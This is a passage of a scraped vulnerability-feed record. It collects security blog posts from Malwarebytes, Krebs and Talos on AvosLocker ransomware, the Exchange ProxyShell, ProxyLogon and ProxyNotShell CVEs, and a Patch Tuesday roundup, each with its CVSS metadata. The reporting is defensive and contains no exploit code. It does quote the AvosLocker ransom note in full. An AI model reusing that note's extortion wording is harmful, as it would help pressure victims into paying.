ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-10-03T06:04:32", "description": "**Microsoft Corp.** is investigating reports that attackers are exploiting two previously unknown vulnerabilities in **Exchange Server**, a technology many organizations rely on to send and receive email. Microsoft says it is expediting work on software patches to plug the security holes. In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.\n\n\n\nIn [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040>), is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability -- [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>) -- which allows remote code execution (RCE) when **PowerShell** is accessible to the attacker.\n\nMicrosoft said **Exchange Online** has detections and mitigation in place to protect customers. Customers using _on-premises_ Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.\n\nVietnamese security firm **GTSC** on Thursday [published a writeup on the two Exchange zero-day flaws](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), saying it first observed the attacks in early August being used to drop "webshells." These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.\n\n"We detected webshells, mostly obfuscated, being dropped to Exchange servers," GTSC wrote. "Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese."\n\nGTSC's advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.\n\nIn March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to [four zero-day vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>). \n\nGranted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year's Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers. \n\nMicrosoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server. \n\n**Steven Adair** is president of [Volexity](<https://www.volexity.com>), the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC's writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials. \n\nIn February 2022, Volexity [warned](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>) that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the **Zimbra Collaboration Suite**, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging. \n\nIf your organization runs Exchange Server, please consider reviewing [the Microsoft mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and [the GTSC post-mortem](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on their investigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:51:57", "type": "krebs", "title": "Microsoft: Two New 0-Day Flaws in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:51:57", "id": "KREBS:6E25B247DFBFC9267C00F36CE0695768", "href": "https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-13T06:06:48", "description": "Let's face it: Having \u201c2022 election\u201d in the headline above is probably the only reason anyone might read this story today. Still, while most of us here in the United States are anxiously awaiting the results of how well we've patched our Democracy, it seems fitting that **Microsoft Corp.** today released gobs of security patches for its ubiquitous **Windows** operating systems. November's patch batch includes fixes for _a whopping six zero-day security vulnerabilities_ that miscreants and malware are already exploiting in the wild.\n\n\n\nProbably the scariest of the zero-day flaws is [CVE-2022-41128](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41128>), a "critical" weakness in the Windows scripting languages that could be used to foist malicious software on vulnerable users who do nothing more than browse to a hacked or malicious site that exploits the weakness. Microsoft credits **Google** with reporting the vulnerability, which earned a CVSS score of 8.8.\n\n[CVE-2022-41073](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073>) is a zero-day flaw in the **Windows Print Spooler**, a Windows component that Microsoft has patched mightily over the past year. **Kevin Breen**, director of cyber threat research at **Immersive Labs**, noted that the print spooler has been a popular target for vulnerabilities in the last 12 months, with this marking the 9th patch.\n\nThe third zero-day Microsoft patched this month is [CVE-2022-41125](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41125>), which is an "elevation of privilege" vulnerability in the Windows Cryptography API: Next Generation (CNG) Key Isolation Service, a service for isolating private keys. **Satnam Narang**, senior staff research engineer at **Tenable**, said exploitation of this vulnerability could grant an attacker SYSTEM privileges.\n\nThe fourth zero-day, [CVE-2022-41091](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41091>), was previously disclosed and widely reported on in October. It is a Security Feature Bypass of \u201cWindows Mark of the Web\u201d \u2013 a mechanism meant to flag files that have come from an untrusted source.\n\nThe other two zero-day bugs Microsoft patched this month were for vulnerabilities being exploited in **Exchange Server**. News that these two Exchange flaws were being exploited in the wild [surfaced in late September 2022](<https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/>), and many were surprised when Microsoft let October's Patch Tuesday sail by without issuing official patches for them (the company instead issued mitigation instructions that it was forced to revise multiple times). Today's patch batch addresses both issues.\n\n**Greg Wiseman**, product manager at **Rapid7**, said the Exchange flaw [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040>) is a \u201ccritical\u201d elevation of privilege vulnerability, and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082>) is considered Important, allowing Remote Code Execution (RCE) when PowerShell is accessible to the attacker.\n\n"Both vulnerabilities have been exploited in the wild," Wiseman said. "Four other CVEs affecting Exchange Server have also been addressed this month. Three are rated as Important, and [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) is another privilege escalation vulnerability considered Critical. Customers are advised to update their Exchange Server systems immediately, regardless of whether any previously recommended mitigation steps have been applied. The mitigation rules are no longer recommended once systems have been patched."\n\n**Adobe** usually issues security updates for its products on Patch Tuesday, but it did not this month. For a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+November+2022+Patch+Tuesday/29230/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T01:50:14", "type": "krebs", "title": "Patch Tuesday, November 2022 Election Edition", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41073", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41091", "CVE-2022-41125", "CVE-2022-41128"], "modified": "2022-11-09T01:50:14", "id": "KREBS:E910A9996E07E6C63E0C32D6520D0F25", "href": "https://krebsonsecurity.com/2022/11/patch-tuesday-november-2022-election-edition/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-10-28T20:49:32", "description": "\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I've been [diving a lot into apps' privacy policies recently](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>). And I was recently made aware of a new type of app I never knew existed -- family trackers.\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me -- it'd be a supped-up version of Find my Friends on Apple devices so I'd never have to ask my teenager (granted, I'm many years away from being at that stage of my life) when they were coming home or where they were.\n\nJust as with all other types of mobile apps, there are pitfalls, though.\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data on its users](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>), potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn't intend to let adversaries see this information, they don't have direct control over how those third parties handle the information once it's sold off.\n\nThe [app's current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes," though users do have the ability to opt out of this inside the app.\n\nThere is hardware that offers this same type of tracking. Jealous, angry or paranoid spouses and parents have [used Apple's AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags' security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings.\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children's safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we've said before, [no one truly has "nothing to hide,"](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I'm not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it's worth considering what sacrifices we might be making elsewhere. \n\n\n## The one big thing\n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.\n\n## Top security headlines from the week \n\n\nMore than 2 million Australians' personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company's CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver's license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>))\n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>))\n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>))\n\n## Can't get enough Talos?\n\n * [Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)\n * [Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)\n * [Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)\n * [Talos Takes Ep. #115: An \"insider threat\" ](<https://www.buzzsprout.com/2018149/episodes/11413990>)doesn't always have to know they're a threat\n * [Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)\n * [Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>) \n\n\n## Upcoming events where you can find Talos \n\n\n[_**Cisco Security Solution Expert Sessions**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 11 & 13)** \nVirtual \n\n \n[_**GovWare 2022**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)** (Oct. 18 - 20)** \nSands Expo & Convention Centre, Singapore \n\n \n[_**Conference On Applied Machine Learning For Information Security**_](<https://www.blogger.com/u/1/blog/post/edit/1029833275466591797/5980034587248183130#>)_** **_**(Oct. 20 - 21)** \nSands Capital Management, Arlington, Virginia", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:FB5080C7655BA3C4C2856F34457CBCD0", "href": "https://blog.talosintelligence.com/threat-source-newsletter-oct-6-2022-continuing-down-the-privacy-policy-rabbit-hole/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T19:13:58", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n \n\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I\u2019ve been [diving a lot into apps\u2019 privacy policies](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>) recently. And I was recently made aware of a new type of app I never knew existed \u2014 family trackers. \n\n \n\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me \u2014 it\u2019d be a supped-up version of Find my Friends on Apple devices so I\u2019d never have to ask my teenager (granted, I\u2019m many years away from being at that stage of my life) when they were coming home or where they were. \n\n \n\n\nJust as with all other types of mobile apps, there are pitfalls, though. \n\n \n\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>) on its users, potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn\u2019t intend to let adversaries see this information, they don\u2019t have direct control over how those third parties handle the information once it\u2019s sold off. \n\n \n\n\nThe [app\u2019s current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes.\u201d However, users do have the ability to opt out of this inside the app. \n\n \n\n\nThere is hardware that offers this same type of tracking. Jealous, angry or paranoid spouses and parents have used [Apple\u2019s AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags\u2019 security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings. \n\n \n\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children\u2019s safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we\u2019ve said before, [no one truly has \u201cnothing to hide,\u201d](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I\u2019m not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it\u2019s worth considering what sacrifices we might be making elsewhere. \n\n \n\n\n \n\n\n## The one big thing \n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n\n> ### Why do I care? \n> \n> Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year. \n> \n> ### So now what?\n\n> While no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.darkreading.com/remote-workforce/microsoft-updates-mitigation-for-exchange-server-zero-days>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. While Microsoft continues to update their mitigations, some security researchers [posit they can be bypassed](<https://twitter.com/GossiTheDog/status/1575813395835547651>). Talos has released several Snort rules to detect the exploitation of these vulnerabilities and associate malware families used in these attacks. \n\n> \n\n## Top security headlines from the week\n\n \n\n\nMore than 2 million Australians\u2019 personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company\u2019s CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver\u2019s license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>)) \n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>)) \n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * * _[Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)_\n * _[Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)_\n * _[Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)_\n * _[Talos Takes Ep. #115: An \"insider threat\" doesn't always have to know they're a threat](<https://www.buzzsprout.com/2018149/episodes/11413990>)_\n * _[Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)_\n * _[Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>)_\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**_[Cisco Security Solution Expert Sessions](<https://web.cvent.com/event/f150cd18-061b-4c25-b617-044c50cac855/summary>)_ (Oct. 11 & 13)**\n\nVirtual \n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 18 - 20)**\n\nSands Expo & 